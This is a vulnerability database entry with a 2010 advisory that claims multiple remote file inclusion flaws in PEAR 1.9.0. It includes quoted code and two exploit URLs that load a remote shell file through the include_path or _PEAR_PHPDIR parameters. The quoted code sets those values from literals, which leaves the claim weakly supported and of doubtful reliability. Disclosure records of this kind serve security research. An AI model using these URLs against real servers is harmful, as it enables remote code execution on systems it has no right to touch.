PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability

vendor:

PEAR

by:

eidelweiss

7,5

CVSS

HIGH

Remote File Inclusion Vulnerability

CWE

Product Name: PEAR

Affected Version From: v.1.9.0

Affected Version To: v.1.9.0

Patch Exists: NO

Related CWE: N/A

CPE: a:pearproject:pear:1.9.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability

An attacker can exploit this vulnerability by sending a crafted URL to the vulnerable application. The crafted URL contains the malicious payload in the include_path or _PEAR_PHPDIR parameter which will be processed by the vulnerable application. This can result in arbitrary remote code execution on the vulnerable system.

Mitigation:

The application should validate the input parameters and filter out any malicious input. The application should also restrict the access to the vulnerable page.

Source

Exploit-DB raw data:

###########################################################
###
### PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability
##
###########################################################
###     PEAR, the PHP Extension and Application Repository
###
###     * @package        PEAR
###     * @Version        v.1.9.0
###     * @license        http://opensource.org/licenses/bsd-license.php New BSD License
###     * @link           http://pear.php.net/package/PEAR
###
###########################################################
###
###     Type :  Remote File Inclusion Vulnerability
###     Author: eidelweiss
###     Date  : 2010-02-14
###     Location:       Indonesia ( http://yogyacarderlink.web.id )
###     Contact:        g1xsystem [at] windowslive [dot] com
###     Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal (C)yber
###
###########################################################
###
###     Vuln:   if ('../DIRECTORY_SEPARATOR/PEAR' != '@'.'include_path'.'@') {
###                     ini_set('include_path', '../DIRECTORY_SEPARATOR/PEAR');
###                     $raw = true;
###             }
###             @ini_set('allow_url_fopen', true);
###             if (!ini_get('safe_mode')) {
###             @set_time_limit(0);
###             }
###     $_PEAR_PHPDIR = '#$%^&*';
###             define('PEAR_RUNTYPE', 'pecl');
###             require_once 'pearcmd.php';
###             require_once 'PEAR.php';
###             require_once 'PEAR/Frontend.php';
###             require_once 'PEAR/Config.php';
###             require_once 'PEAR/Command.php';
###             require_once 'Console/Getopt.php';
###     =========================================================
###     exploit:        http://victim.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?include_path=[Shell.txt?]
###             http://victim.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?_PEAR_PHPDIR =[Shell.txt?]
###########################################################